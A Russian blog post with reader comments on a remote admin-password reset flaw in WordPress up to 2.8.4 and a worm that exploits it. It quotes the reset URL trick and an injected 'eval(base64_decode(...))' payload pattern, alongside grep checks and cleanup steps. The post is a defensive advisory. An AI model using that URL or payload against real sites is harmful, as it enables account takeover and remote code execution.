На секлабе проскальзывала новость о том, как удаленно скинуть пароль админа в вп.
Если кратко, то вот так:
wp-login.php?action=rp&key[]=
И вот уже червячок появился.
Что делает. Подставляет свой код, расположенный на другом сервере и выполняет его. Уязвимы версии до 2.8.4
Проверяемся
Беглый осмотр.
Если все ссылки или фид стали со странными дополнениями вида
eval(base64_decode($_SERVER[HTTP_REFERER]))
или вроде, в админке в разделе пользователи появилась такая картина
, т.е. пользователей два, а вверху показывается три, это не глюк вп, это хитрый яваскрипт скрывает третьего пользователя от вас. На скрине и второй пользователь тоже через дырку добавлен ))
Далее проверяем на иньекцию в базе:
grep -H -r “eval(base64_decode” /var/lib/mysql grep -H -r “var setUserName = function” /var/lib/mysql
Если есть совпадение, то значит база заражена. Также можно проверить папки на инлюд функции:
grep -r -i "function gpc_" ./*
У себя три блога нашел взломанных. Проверить наличие левых администраторов в блоге
Лечимся.
- Правим пермалинки.
- Далее из таблицы wp-usermeta.php запоминаем все id юзеров с meta_key — ‘first_name’.
- Потом сносим их из wp_users.
- Удаляем их также и из wp-usermeta.php
7 комментариев
Однако, спасибо за инфу. Несколько блогов на WP. Срочно буду обновляться.
чет не получилось у меня сбросить пароль на 2.7.1.
Какие версии у тебя взломали?
2.8.3 все три штуки. Пароль сбрасывал на этом блоге, когда он был 2.8.3. Все сбросилось.
До 2.7.1 пока не добрались 🙂 . Бомбят версии 2.8 кроме четвёртой. Вот яркий пример того, что лучшее — враг хорошего 🙂 .
именно так и есть
отлично
кстати 2.8.3 не такая уж и старая, у некоторых не обновлена еще
Спасибо за информацию. К безопасности блога отношусь очень внимательно после того, как его взломали. Появились несколько «кракозябр» в админке. Посмотрел код страниц: добавлен код. Пришлось похожие манипуляции с сайтом проделывать.